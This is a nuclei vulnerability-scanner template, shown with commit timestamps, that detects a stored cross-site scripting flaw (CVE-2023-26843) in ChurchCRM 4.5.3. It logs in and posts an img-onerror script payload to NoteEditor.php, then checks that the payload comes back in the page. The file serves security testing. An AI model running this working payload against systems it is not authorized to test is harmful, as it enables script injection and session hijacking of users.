nuclei-templates/http/cves/2023/CVE-2023-26843.yaml

56 lines
2.1 KiB
YAML
Raw Normal View History

2023-06-24 20:21:22 +00:00
id: CVE-2023-26843
info:
2023-06-26 05:15:22 +00:00
name: ChurchCRM 4.5.3 - Cross-Site Scripting
2023-06-24 20:21:22 +00:00
author: Harsh
severity: medium
description: |
A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
2023-06-24 20:21:22 +00:00
reference:
- https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26843
- https://nvd.nist.gov/vuln/detail/CVE-2023-26843
2023-07-11 19:49:27 +00:00
- https://github.com/ChurchCRM/CRM
2023-06-24 20:21:22 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-26843
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00146
epss-percentile: 0.50378
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
2023-06-24 20:21:22 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: churchcrm
product: churchcrm
2023-07-07 10:04:00 +00:00
tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated
2023-06-26 05:15:22 +00:00
2023-06-24 20:21:22 +00:00
http:
- raw:
- |
2023-06-26 05:15:22 +00:00
POST /session/begin HTTP/1.1
2023-06-24 20:21:22 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User={{username}}&Password={{password}}
- |
2023-06-26 05:15:22 +00:00
POST /NoteEditor.php?FamilyID=1 HTTP/1.1
2023-06-24 20:21:22 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
PersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
2023-06-26 05:15:22 +00:00
- 'contains(content_type_2, "text/html")'
2023-06-24 20:21:22 +00:00
- 'contains(body_2, "><img src=x onerror=alert(document.domain)>")'
- 'contains(body_2, "ChurchCRM")'
condition: and
# digest: 4a0a00473045022100da81855e534da680f5367c9e313d21eccb7b84457eaaebe5964643d28376e68b02203918a6b72c7c052c7228272de84d7ea262b0a59f1be4371c91cc12f921cd2a91:922c64590222798bb761d5b6d8e72950